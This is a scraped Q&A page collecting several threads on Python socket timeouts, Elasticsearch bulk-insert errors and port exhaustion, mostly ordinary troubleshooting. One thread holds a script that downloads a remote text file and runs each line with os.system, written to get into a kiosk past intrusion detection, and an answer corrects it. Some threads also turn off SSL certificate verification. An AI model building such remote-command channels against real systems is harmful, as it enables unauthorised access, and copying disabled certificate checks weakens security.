I have a python script on an Amazon EC2 server that's requesting data from two different servers (using urllib and http.request), that data is then recorded on a text file. It has to be running for a long time. I am using nohup to get it running on the background.
The thing is, it stops after a while (sometimes it lasts 24 hours, sometimes 2 hours, it varies). I don't get an error message or anything. It just stops and the last string of characters received are just saved in the text file as an incomplete string (just the info that could read from the remote server).
What could be causing this problem?
This is the code I have:
import urllib3 # sudo pip install urllib3 --upgrade
import time
urllib3.disable_warnings() # Disable urllib3 warnings about unverified connections
http = urllib3.PoolManager()
f = open('okcoin.txt', 'w')
f2 = open('bitvc.txt', 'w')
while True:
try:
r = http.request("GET","https://www.okcoin.com/api/v1/future_ticker.do?symbol=btc_usd&contract_type=this_week")
r2 = http.request("GET","http://market.bitvc.com/futures/ticker_btc_week.js ")
except: # catch all exceptions
continue
#Status codes of 200 if it got an OK from the server
if r.status != 200 or r2.status != 200 or r.data.count(',') < 5 or r2.data.count(',') < 5: # avoids blank data, there should be at least 5 commas so that it's correct data
continue; # Try to read again if there was a problem with one reading
received = str(time.time()) # Timestamp of when the information was received to the server running this python code
data = r.data + "," + received + "\r\n"
data2 = r2.data + "," + received + "\r\n"
print data,r.status
print data2, r.status
f.write(data)
f2.write(data2)
time.sleep(0.5)
f.flush() #flush files
f2.flush()
f.close()
f2.close()
EDIT: I left the program opened using screen through ssh. It stopped again. If I press "CTRL+C" to stop it, this is what I get:
^CTraceback (most recent call last):
File "tickersave.py", line 72, in <module>
r2 = http.request("GET","http://market.bitvc.com/futures/ticker_btc_week.js")
File "/usr/local/lib/python2.7/dist-packages/urllib3/request.py", line 68, in request
**urlopen_kw)
File "/usr/local/lib/python2.7/dist-packages/urllib3/request.py", line 81, in request_encode_url
return self.urlopen(method, url, **urlopen_kw)
File "/usr/local/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 153, in urlopen
response = conn.urlopen(method, u.request_uri, **kw)
File "/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 541, in urlopen
**response_kw)
File "/usr/local/lib/python2.7/dist-packages/urllib3/response.py", line 284, in from_httplib
**response_kw)
File "/usr/local/lib/python2.7/dist-packages/urllib3/response.py", line 104, in __init__
self._body = self.read(decode_content=decode_content)
File "/usr/local/lib/python2.7/dist-packages/urllib3/response.py", line 182, in read
data = self._fp.read()
File "/usr/lib/python2.7/httplib.py", line 551, in read
s = self._safe_read(self.length)
File "/usr/lib/python2.7/httplib.py", line 658, in _safe_read
chunk = self.fp.read(min(amt, MAXAMOUNT))
File "/usr/lib/python2.7/socket.py", line 380, in read
data = self._sock.recv(left)
Any clues? Should I add timeouts or something?
Collect all output of your program and you will find a very good hint about what is wrong. That is, definitely collect stdout and stderr. For this to happen, you might want to call your program like that:
$ nohup python script.py > log.outerr 2>&1 &
That collects both, stdout and stderr in the file log.outerr, and starts your program decoupled from the tty and in the background. Investigating log.outerr after your program has stopped working will probably be quite revealing, I guess.
Related
ElasticSearch 7.10.2
Python 3.8.5
elasticsearch-py 7.12.1
I'm trying to do a bulk insert of 100,000 records to ElasticSearch using elasticsearch-py bulk helper.
Here is the Python code:
import sys
import datetime
import json
import os
import logging
from elasticsearch import Elasticsearch
from elasticsearch.helpers import streaming_bulk
# ES Configuration start
es_hosts = [
"http://localhost:9200",]
es_api_user = 'user'
es_api_password = 'pw'
index_name = 'index1'
chunk_size = 10000
errors_before_interrupt = 5
refresh_index_after_insert = False
max_insert_retries = 3
yield_ok = False # if set to False will skip successful documents in the output
# ES Configuration end
# =======================
filename = file.json
logging.info('Importing data from {}'.format(filename))
es = Elasticsearch(
es_hosts,
#http_auth=(es_api_user, es_api_password),
sniff_on_start=True, # sniff before doing anything
sniff_on_connection_fail=True, # refresh nodes after a node fails to respond
sniffer_timeout=60, # and also every 60 seconds
retry_on_timeout=True, # should timeout trigger a retry on different node?
)
def data_generator():
f = open(filename)
for line in f:
yield {**json.loads(line), **{
"_index": index_name,
}}
errors_count = 0
for ok, result in streaming_bulk(es, data_generator(), chunk_size=chunk_size, refresh=refresh_index_after_insert,
max_retries=max_insert_retries, yield_ok=yield_ok):
if ok is not True:
logging.error('Failed to import data')
logging.error(str(result))
errors_count += 1
if errors_count == errors_before_interrupt:
logging.fatal('Too many import errors, exiting with error code')
exit(1)
print("Documents loaded to Elasticsearch")
When the json file contains a small amount of documents (~100), this code runs without issue. But I just tested it with a file of 100k documents, and I got this error:
WARNING:elasticsearch:POST http://127.0.0.1:9200/_bulk?refresh=false [status:N/A request:10.010s]
Traceback (most recent call last):
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 426, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 421, in _make_request
httplib_response = conn.getresponse()
File "/Users/me/opt/anaconda3/lib/python3.8/http/client.py", line 1347, in getresponse
response.begin()
File "/Users/me/opt/anaconda3/lib/python3.8/http/client.py", line 307, in begin
version, status, reason = self._read_status()
File "/Users/me/opt/anaconda3/lib/python3.8/http/client.py", line 268, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/Users/me/opt/anaconda3/lib/python3.8/socket.py", line 669, in readinto
return self._sock.recv_into(b)
socket.timeout: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/elasticsearch/connection/http_urllib3.py", line 251, in perform_request
response = self.pool.urlopen(
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 726, in urlopen
retries = retries.increment(
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/util/retry.py", line 386, in increment
raise six.reraise(type(error), error, _stacktrace)
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/packages/six.py", line 735, in reraise
raise value
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 670, in urlopen
httplib_response = self._make_request(
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 428, in _make_request
self._raise_timeout(err=e, url=url, timeout_value=read_timeout)
File "/Users/me/opt/anaconda3/lib/python3.8/site-packages/urllib3/connectionpool.py", line 335, in _raise_timeout
raise ReadTimeoutError(
urllib3.exceptions.ReadTimeoutError: HTTPConnectionPool(host='127.0.0.1', port=9200): Read timed out. (read timeout=10)
I have to admit this one is a bit over my head. I don't typically like to paste large error messages here, but I'm not sure what about this message is relevant.
I can't help but think that I maybe need to adjust some of the params in the es object? Or the configuration variables? I don't know enough about the params to be able to make an educated decision on my own.
And the last but certainly not least point - it looks like some documents were loaded into the ES index nonetheless. But even stranger, the count shows 110k when the json file only has 100k.
TL;DR:
Reduce the chunk_size from 10000 to the default of 500 and I'd expect it to work. You probably want to disable automatic retries if that can give you duplicates.
What happened?
When creating your Elasticsearch object, you specified chunk_size=10000. This means that the streaming_bulk call will try to insert chunks of 10000 elements. The connection to elasticsearch has a configurable timeout, which by default is 10 seconds. So, if your elasticsearch server takes more than 10 seconds to process the 10000 elements you want to insert, a timeout will happen and this will be handled as an error.
When creating your Elasticsearch object, you also specified retry_on_timeout as True and in the streaming_bulk_call you set max_retries=max_insert_retries, which is 3.
This means that when such a timeout happens, the library will try reconnecting 3 times, however, when the insert still has a timeout after that, it will give you the error you noticed. (Documentation)
Also, when the timeout happens, the library can not know whether the documents were inserted successfully, so it has to assume that they were not. Thus, it will try to insert the same documents again. I don't know how your input lines look like, but if they do not contain an _id field, this would create duplicates in your index. You probably want to prevent this -- either by adding some kind of _id, or by disabling the automatic retry and handling it manually.
What to do?
There is two ways you can go about this:
Increase the timeout
Reduce the chunk_size
streaming_bulk by default has chunk_size set to 500. Your 10000 is much higher. I wouldn't expect a high performance gain when increasing this to more than 500, so I'd advice you to just use the default of 500 here. If 500 still fails with a timeout, you may even want to reduce it further. This could happen if the documents you want to index are very complex.
You could also increase the timeout for the streaming_bulk call, or, alternatively, for your es object. To only change it for the streaming_bulk call, you can provide the request_timeout keyword argument:
for ok, result in streaming_bulk(
es,
data_generator(),
chunk_size=chunk_size,
refresh=refresh_index_after_insert,
request_timeout=60*3, # 3 minutes
yield_ok=yield_ok):
# handle like you did
pass
However, this also means that elasticsearch node failure will only be detected after this higher timeout. See the documentation for more details
I have a script that is supposed to read a text file from a remote server, and then execute whatever is in the txt file.
For example, if the text file has the command: "ls". The computer will run the command and list directory.
Also, pls don't suggest using urllib2 or whatever. I want to stick with python3.x
As soon as i run it i get this error:
Traceback (most recent call last):
File "test.py", line 4, in <module>
data = urllib.request.urlopen(IP_Address)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 509, in open
req = Request(fullurl, data)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 328, in __init__
self.full_url = url
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 354, in full_url
self._parse()
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 383, in _parse
raise ValueError("unknown url type: %r" % self.full_url) ValueError: unknown url type: 'domain.com/test.txt'
Here is my code:
import urllib.request
IP_Address = "domain.com/test.txt"
data = urllib.request.urlopen(IP_Address)
for line in data:
print("####")
os.system(line)
Edit:
yes i realize this is a bad idea. It is a school project, we are playing red team and we are supposed to get access to a kiosk. I figured instead of writing code that will try and get around intrusion detection and firewalls, it would just be easier to execute commands from a remote server. Thanks for the help everyone!
The error occurs because your url does not include a protocol. Include "http://" (or https if you're using ssl/tls) and it should work.
As others have commented, this is a dangerous thing to do since someone could run arbitrary commands on your system this way.
Try
“http://localhost/domain.com/test.txt"
Or remote address
If local host need to run http server
Overview: I am calling an API with python2.7 using the urllib2 and json libraries. When I run the script I receive the following error if the results count is higher than 20:
error: [Errno 10054] An existing connection was forcibly closed by the
remote host
Script:
import json
import urllib2
import webbrowser
url = "http://poi.????.com:xxxx/k/search?name==smith&limit==30"
response = urllib2.urlopen(url)
webbrowser.open(url)
data = json.load(response)
count = "count = "+str(data['count'])
print count
for i in data['results']:
name = i['name']
print name
Expected Outcome: I run the script, API responds with a '200 OK' status and my webbrowser.open(url) line opens the response in my browser. My IDLE shell prints the output.
Issue: When I use the limit parameter in the API and set it to <20 it responds as expected in my IDLE shell. However if I set limit > 20 or don't set a limit, I still get a 200 OK response, the browser populates with the results but my IDLE shell produces the 'connection was forcibly closed' error.
Software: I've tried this on windows 7/8 and Ubuntu 14.04. At home via VPN and at work across a wired network.
Traceback Call in IDLE:
Traceback (most recent call last):
File "C:\Users\xxx\userQueryService.py", line 9, in <module>
data = json.load(response)
File "C:\Python27\lib\json\__init__.py", line 286, in load
return loads(fp.read(),
File "C:\Python27\lib\socket.py", line 351, in read
data = self._sock.recv(rbufsize)
File "C:\Python27\lib\httplib.py", line 573, in read
s = self.fp.read(amt)
File "C:\Python27\lib\socket.py", line 380, in read
data = self._sock.recv(left)
error: [Errno 10054] An existing connection was forcibly closed by the remote host
Traceback call in Ubuntu python shell:
>>> data = json.load(response)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python2.7/json/__init__.py", line 290, in load
**kw)
File "/usr/lib/python2.7/json/__init__.py", line 338, in loads
return _default_decoder.decode(s)
File "/usr/lib/python2.7/json/decoder.py", line 366, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/usr/lib/python2.7/json/decoder.py", line 382, in raw_decode
obj, end = self.scan_once(s, idx)
ValueError: Unterminated string starting at: line 1 column 43303 (char 43302)
I managed to solve my issue by using the requests library instead of urllib2 and json. I've included my code for those that have a similar issue (note I also included a exception handler):
import webbrowser
import requests
url = "http://poi.????.com:xxxx/k/search?name==smith&limit==30"
r = requests.get(url)
try:
data = r.json()
webbrowser.open(url)
count = "count = "+str(data['count'])
print count
for i in data['results']:
name = i['name']
print name
except IOError as (errno, strerror):
print "I/O error({0}): {1}".format(errno, strerror)
I have a Python script that downloads product feeds from multiple affiliates in different ways. This didn't give me any problems until last Wednesday, when it started throwing all kinds of timeout exceptions from different locations.
Examples: Here I connect with a FTP service:
ftp = FTP(host=self.host)
threw:
Exception in thread Thread-7:
Traceback (most recent call last):
File "C:\Python27\Lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\Lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\Users\Administrator\Documents\Crawler\src\Crawlers\LDLC.py", line 23, in main
ftp = FTP(host=self.host)
File "C:\Python27\Lib\ftplib.py", line 120, in __init__
self.connect(host)
File "C:\Python27\Lib\ftplib.py", line 138, in connect
self.welcome = self.getresp()
File "C:\Python27\Lib\ftplib.py", line 215, in getresp
resp = self.getmultiline()
File "C:\Python27\Lib\ftplib.py", line 201, in getmultiline
line = self.getline()
File "C:\Python27\Lib\ftplib.py", line 186, in getline
line = self.file.readline(self.maxline + 1)
File "C:\Python27\Lib\socket.py", line 476, in readline
data = self._sock.recv(self._rbufsize)
timeout: timed out
Or downloading an XML File :
xmlFile = urllib.URLopener()
xmlFile.retrieve(url, self.feedPath + affiliate + "/" + website + '.' + fileType)
xmlFile.close()
throws:
File "C:\Users\Administrator\Documents\Crawler\src\Crawlers\FeedCrawler.py", line 106, in save
xmlFile.retrieve(url, self.feedPath + affiliate + "/" + website + '.' + fileType)
File "C:\Python27\Lib\urllib.py", line 240, in retrieve
fp = self.open(url, data)
File "C:\Python27\Lib\urllib.py", line 208, in open
return getattr(self, name)(url)
File "C:\Python27\Lib\urllib.py", line 346, in open_http
errcode, errmsg, headers = h.getreply()
File "C:\Python27\Lib\httplib.py", line 1139, in getreply
response = self._conn.getresponse()
File "C:\Python27\Lib\httplib.py", line 1067, in getresponse
response.begin()
File "C:\Python27\Lib\httplib.py", line 409, in begin
version, status, reason = self._read_status()
File "C:\Python27\Lib\httplib.py", line 365, in _read_status
line = self.fp.readline(_MAXLINE + 1)
File "C:\Python27\Lib\socket.py", line 476, in readline
data = self._sock.recv(self._rbufsize)
IOError: [Errno socket error] timed out
These are just two examples but there are other methods, like authenticate or other API specific methods where my script throws these timeout errors. It never showed this behavior until Wednesday. Also, it starts throwing them at random times. Sometimes at the beginning of the crawl, sometimes later on. My script has this behavior on both my server and my local machine. I've been struggling with it for two days now but can't seem to figure it out.
This is what I know might have caused this:
On Wednesday one affiliate script broke down with the following error:
URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:581)>
I didn't change anything to my script but suddenly it stopped crawling that affiliate and threw that error all the time where I tried to authenticate. I looked it up and found that is was due to an OpenSSL error (where did that come from). I fixed it by adding the following before the authenticate method:
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
Little did I know, this was just the start of my problems... At that same time, I changed from Python 2.7.8 to Python 2.7.9. It seems that this is the moment that everything broke down and started throwing timeouts.
I tried changing my script in endless ways but nothing worked and like I said, it's not just one method that throws it. Also I switched back to Python 2.7.8, but this didn't do the trick either. Basically everything that makes a request to an external source can throw an error.
Final note: My script is multi threaded. It downloads product feeds from different affiliates at the same time. It used to run 10 threads per affiliate without a problem. Now I tried lowering it to 3 per affiliate, but it still throws these errors. Setting it to 1 is no option because that will take ages. I don't think that's the problem anyway because it used to work fine.
What could be wrong?
I have a web-service deployed in my box. I want to check the result of this service with various input. Here is the code I am using:
import sys
import httplib
import urllib
apUrl = "someUrl:somePort"
fileName = sys.argv[1]
conn = httplib.HTTPConnection(apUrl)
titlesFile = open(fileName, 'r')
try:
for title in titlesFile:
title = title.strip()
params = urllib.urlencode({'search': 'abcd', 'text': title})
conn.request("POST", "/somePath/", params)
response = conn.getresponse()
data = response.read().strip()
print data+"\t"+title
conn.close()
finally:
titlesFile.close()
This code is giving an error after same number of lines printed (28233). Error message:
Traceback (most recent call last):
File "testService.py", line 19, in ?
conn.request("POST", "/somePath/", params)
File "/usr/lib/python2.4/httplib.py", line 810, in request
self._send_request(method, url, body, headers)
File "/usr/lib/python2.4/httplib.py", line 833, in _send_request
self.endheaders()
File "/usr/lib/python2.4/httplib.py", line 804, in endheaders
self._send_output()
File "/usr/lib/python2.4/httplib.py", line 685, in _send_output
self.send(msg)
File "/usr/lib/python2.4/httplib.py", line 652, in send
self.connect()
File "/usr/lib/python2.4/httplib.py", line 636, in connect
raise socket.error, msg
socket.error: (99, 'Cannot assign requested address')
I am using Python 2.4.3. I am doing conn.close() also. But why is this error being given?
This is not a python problem.
In linux kernel 2.4 the ephemeral port range is from 32768 through 61000. So number of available ports = 61000-32768+1 = 28233. From what i understood, because the web-service in question is quite fast (<5ms actually) thus all the ports get used up. The program has to wait for about a minute or two for the ports to close.
What I did was to count the number of conn.close(). When the number was 28000 wait for 90sec and reset the counter.
BIGYaN identified the problem correctly and you can verify that by calling "netstat -tn" right after the exception occurs. You will see very many connections with state "TIME_WAIT".
The alternative to waiting for port numbers to become available again is to simply use one connection for all requests. You are not required to call conn.close() after each call of conn.request(). You can simply leave the connection open until you are done with your requests.
I too faced similar issue while executing multiple POST statements using python's request library in Spark. To make it worse, I used multiprocessing over each executor to post to a server. So thousands of connections created in seconds that took few seconds each to change the state from TIME_WAIT and release the ports for the next set of connections.
Out of all the available solutions available over the internet that speak of disabling keep-alive, using with request.Session() et al, I found this answer to be working which makes use of 'Connection' : 'close' configuration as header parameter. You may need to put the header content in a separte line outside the post command though.
headers = {
'Connection': 'close'
}
with requests.Session() as session:
response = session.post('https://xx.xxx.xxx.x/xxxxxx/x', headers=headers, files=files, verify=False)
results = response.json()
print results
This is my answer to the similar issue using the above solution.